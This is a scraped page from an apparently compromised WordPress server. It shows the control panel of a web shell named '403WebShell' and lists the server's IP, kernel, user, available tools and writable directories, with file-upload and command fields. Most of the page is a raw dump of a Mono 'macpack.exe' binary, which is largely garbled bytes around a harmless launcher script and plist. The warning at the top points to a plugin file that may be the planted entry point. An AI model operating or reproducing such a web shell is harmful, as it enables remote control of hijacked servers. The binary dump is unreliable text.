Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8
[0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8
[1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560
[2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85
[3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50
[4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13
[5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
403WebShell
403Webshell
Server IP : 94.177.8.99  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /lib/mono/4.5/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /lib/mono/4.5/macpack.exe
MZ����@���	�!�L�!This program cannot be run in DOS mode.

$PEL�D^b �@ �@�bK� �  H.textdB D `.rsrc �F@@.reloc�J@B@bH4�-�*A	(
*(
*:(
}*0?{{:{rp}{{:(
rpo
(*{{:;{{(

~
o
;
Xo

{}{{r]p{{(
(	
(

9rmp(
*{{r]p{{(
(	
(
&{{r�p{{(
(	
(
&{{rp{{(
(	
(
&{{r=p{{(
(	
(
&{{9�{{
8�	�(

96{{rsp{{(

(
(	
(81{{rsp{{(

(
(	
(
�(
r�po
o
�X	�i?V���{{9E{{{{rsp{{{{(

(
(	
(
{{=:{{{{rp{{(
(	
(
85{{{{rKp{{(
(	
(
(
r�po
s
o
io
o
{{r�p{{(
(	
(
s
	(
o

{{EV��8
r�pr�po


r�pr�po


rpr�po


r!p~
o

8�
r�pr9po


r�pr�po


rpr�po


r!pr=po

8�
r�pr�po


r�pr9po


rpr�po


r!p~
o

8Q
r�pr�po


r�pr�po


rpr9po


r!p~
o

8(

o
	�io
	o 
{{r�p{{(
(	
rQp(!
(&�&rYp{{("
�(
r\po
s
o
io
o
{{rhp{{(
(	
(
s
	(#
o
r�p{{o
r�p{{(

o
(#
o
	�io
	o 
*�w	;W0�o$
Yo%
~
;~
�(&
(

:(
&('


8=	�(

9(

((
(8(

((
()
	X
	�i?����*.r�p(
*0/s
s*
8��
	o$
>9	:o
;	o+
	Xo
8	8	X�i<X�89b~:�s,
r�po-
r�po-
r�po-
r�po-
r�po-
r�po-
r�po-
r�po-
rpo-
r
po-
r!po-
r/po-
r5po-
rApo-
rGpo-
�~o.
9rE	,9{�=G8B}8B}85}8(}8�%,�o/

8
�		o0
&X
�i?���8�rSp(
8�9yr�p(1
:8r�p(1
:3r�p(1
:.r�p(1
:)80}8R}8F}8:}8.(2
}�&(
r�po3
�88(8
}8X�i?����(4
o5
t}so9**���#!/bin/sh
#
# This is a stub script that allows .apps to be relocatable on OSX but still
# find the managed assembly.
#
# You should never have to edit this file directly as its generated by the 
# bundle maker.
#

X11_MODE=%X11_MODE%
MWF_MODE=%MWF_MODE%
COCOASHARP_MODE=%COCOASHARP_MODE%
MONO_ARGS=%MONO_ARGS%

PWD=`pwd`
# Fetch the path relative to the launch point where this shell script exists.
APP_PATH=`echo $0 | awk '{split($0,patharr,"/"); idx=1; while(patharr[idx+3] != "") { if (patharr[idx] != "/") {printf("%s/", patharr[idx]); idx++ }} }'`

# Fetch the app name (its our own name)
APP_NAME=`echo $0 | awk '{split($0,patharr,"/"); idx=1; while(patharr[idx+1] != "") {idx++} printf("%s", patharr[idx]); }'`
ASSEMBLY=`echo $0 | awk '{split($0,patharr,"/"); idx=1; while(patharr[idx+1] != "") {idx++} printf("%s.exe", patharr[idx]); }'`

# Setup the environment for MWF if needed
if [ "$MWF_MODE" -eq "1" ]; then
	export MONO_MWF_USE_CARBON_BACKEND=1
	export GDIPLUS_NOX=1
fi

# Setup the environment for Cocoa# if needed
if [ "$COCOASHARP_MODE" -eq "1" ]; then
	export MONO_GDIP_USE_COCOA_BACKEND=1
	export DYLD_LIBRARY_PATH=$PWD/$APP_PATH/Contents/Resources:$DYLD_LIBRARY_PATH
fi

cd "$APP_PATH/Contents/Resources"

mono4_path=/usr/local/bin/mono
mono5_path=/Library/Frameworks/Mono.framework/Versions/Current/Commands/mono

if [ "$X11_MODE" -eq "1" ]; then
	open-x11 "$APP_NAME"

# rcruzs00
# El Capitan FIX: `which` wont work (system-integrity-protection)
# elif: Keep compatibility with previous code
elif [ -f "$mono4_path" ]; then
        DIR=$(cd "$(dirname "$0")"; pwd)
        "$mono4_path" $MONO_ARGS $DIR/../Resources/"$ASSEMBLY"
elif [ -f "$mono5_path" ]; then
        DIR=$(cd "$(dirname "$0")"; pwd)
        "$mono5_path" $MONO_ARGS $DIR/../Resources/"$ASSEMBLY"
else
	if [ ! -d "./bin" ]; then mkdir bin ; fi
	if [ -f "./bin/$APP_NAME" ]; then rm -f "./bin/$APP_NAME" ; fi
	ln -s `which mono` "./bin/$APP_NAME" 
	"./bin/$APP_NAME" $MONO_ARGS "$ASSEMBLY"
fi
u<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>CFBundleIdentifier</key>
	<string>%APPNAME%</string>
	<key>CFBundleExecutable</key>
	<string>%APPNAME%</string>
	<key>CFBundleIconFile</key>
	<string>%ICONFILE%</string>
</dict>
</plist>
BSJBv4.0.30319l�#~H�#Strings$	#US@#GUIDP�#BlobW	�31;)��������8�`�������������	�1�E�PY�����",a�������+�H�cws���

�		&.5>CLQ��V�VV�hV�tV��V��V��V��V��V��V��Q��V��V��V�V�2V�UV�rV��V��V��V��V��V��V��V�V�6V�MV�kV��V��V��V��V��V��V�V�(V�8V�LV�iV��V��P ��X ��` ���p ����&��Rw'��'��� �<Q����L	��!!!#)?&)G+)Q0!X1j6;1q@!�F)QKA�RI�X]a�da�ii�oYui!yi+A>q�o�e��o�)y�)����q��q+�������)�)��)��1��)�A����)G���?�C�)O��?�)U�g	Qm������������m��$*(s,�0�4�8)<8@IDhHwL�P�T9X�\�`Sdh�l9p�t�x)	|�	�[
��
���Y�
��
�Y����W�����'���@�����B.�B.�S.�`.�s.�|�%�#��"��i�����<Module>MacPackOptionsPackConstsappnameoutputassemblyiconresourcemodeoptsMonoCorlibVersionMonoVersionMonoCompanyMonoProductMonoCopyrightFxVersionFxFileVersionEnvironmentVersionVsVersionVsFileVersionPublicKeyTokenAssemblyI18NAssemblyMicrosoft_JScriptAssemblyMicrosoft_VisualStudioAssemblyMicrosoft_VisualStudio_WebAssemblyMicrosoft_VSDesignerAssemblyMono_HttpAssemblyMono_PosixAssemblyMono_SecurityAssemblyMono_Messaging_RabbitMQAssemblyCorlibAssemblySystemAssemblySystem_DataAssemblySystem_DesignAssemblySystem_DirectoryServicesAssemblySystem_DrawingAssemblySystem_Drawing_DesignAssemblySystem_MessagingAssemblySystem_SecurityAssemblySystem_ServiceProcessAssemblySystem_WebAssemblySystem_Windows_FormsAssemblySystem_2_0AssemblySystemCore_3_5AssemblySystem_CoreWindowsBase_3_0AssemblyWindowsBaseAssemblyPresentationCore_3_5AssemblyPresentationCore_4_0AssemblyPresentationFramework_3_5AssemblySystemServiceModel_3_0ObjectSystem.ctorConsoleget_ErrorTextWriterSystem.IOWriteLinePathChangeExtensionDirectorySeparatorCharStringIndexOfSubstringFormatCombineDirectoryExistsCreateDirectoryDirectoryInfoGetFileNameFileCopyExceptionGetTypeTypeStreamAssemblySystem.ReflectionGetEntryAssemblyGetManifestResourceStreamBinaryReaderget_LengthReadBytesCloseBinaryWriterCreateFileStreamEncodingSystem.Textget_ASCIIGetStringReplaceEmptyGetBytesWriteConvertToUInt32get_UTF8srcdestget_CharsCharConcatGetFileSystemEntriesargs<>f__switch$map0Dictionary`2System.Collections.GenericArrayListSystem.CollectionsAddTryGetValueSplitop_EqualityInt32ParseGetTypeFromHandleRuntimeTypeHandleToArrayArraychmodlibcpathCompilerGeneratedAttributeSystem.Runtime.CompilerServicesGenerateCopyDirectoryUsageMainmacpackAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCopyrightAttributeDebuggableAttributeSystem.DiagnosticsDebuggingModesRuntimeCompatibilityAttributemscorlibLOADERPLISTmacpack.exe.WError: No assembly to macpack was specified{0}.appERROR: That application already exists.  Please delete it first!{0}.app/Contents-{0}.app/Contents/MacOS5{0}.app/Contents/Resources={0}.app/Contents/Resources/{1}SError while processing {0} (Details: {1})E{0}.app/Contents/Resources/{0}.exe={0}.app/Contents/Resources/{0}
LOADER5{0}.app/Contents/MacOS/{0}%MWF_MODE%0#%COCOASHARP_MODE%%X11_MODE%%MONO_ARGS%1--arch=32755�WARNING: It was not possible to set the executable permissions on
the file {0}.app/Contents/MacOS/{0}, the bundle might not workPLIST7{0}.app/Contents/Info.plist%APPNAME%%ICONFILE%��
Usage is:
macpack [options] assembly
   -n appname  -appname:appname    Application Name
   -o output   -output:OUTPUT      Output directory
   -a assembly                     Assembly to pack
   -i file     -icon file          Icon filename
   -r resource1,resource2          Additional files to bundle
   -m [winforms|cocoa|x11|console] The mode for the application-n-appname-o-output-a-assembly-i-icon-r-resource
-about-m-mode-h-help9MacPack 1.0 by Geoff Norton
winformsx11consolecocoaUCould not recognize option {0} as the mode�k0�_�@��U{�KJ 
    ) 1 - - 
 =A    	  M M      )Y ])HABB721D6-116A-4555-B4FD-9248146D20516.8.0.105*Mono development teamFMono Common Language Infrastructure0(c) Various Mono authors4.0.0.04.6.57.04.0.30319.420000.0.0.011.0.0.0 b77a5c561934e089��I18N, Version=4.0.0.0, Culture=neutral, PublicKeyToken=0738eb9f132ed756��Microsoft.JScript, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a��Microsoft.VisualStudio, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a��Microsoft.VisualStudio.Web, Version=0.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a��Microsoft.VSDesigner, Version=0.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a��Mono.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=0738eb9f132ed756��Mono.Posix, Version=4.0.0.0, Culture=neutral, PublicKeyToken=0738eb9f132ed756��Mono.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=0738eb9f132ed756��Mono.Messaging.RabbitMQ, Version=4.0.0.0, Culture=neutral, PublicKeyToken=0738eb9f132ed756��mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089��System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089��System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089��System.Design, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a��System.DirectoryServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a��System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a��System.Drawing.Design, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a��System.Messaging, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a��System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a��System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a��System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a��System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089��System, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089��System.Core, Version=3.5.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089��System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089zWindowsBase, Version=3.0.0.0, PublicKeyToken=31bf3856ad364e35��WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35��PresentationCore, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35��PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35��PresentationFramework, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35��System.ServiceModel, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089  
%-59
QM	macpack.exeMacPackMIT/X11 uTWrapNonExceptionThrows�z\V4�8bNb @b_CorExeMainmscoree.dll�% @�0�HX���4VS_VERSION_INFO��ii?DVarFileInfo$Translation�(StringFileInfo007f04b0(CommentsMacPack$CompanyName @FileDescriptionmacpack.exe4
FileVersion6.8.0.1050InternalNamemacpack4LegalCopyrightMIT/X11,LegalTrademarks @OriginalFilenamemacpack.exe$ProductName 8
ProductVersion6.8.0.105``2

Youez - 2016 - github.com/yon3zu
LinuXploit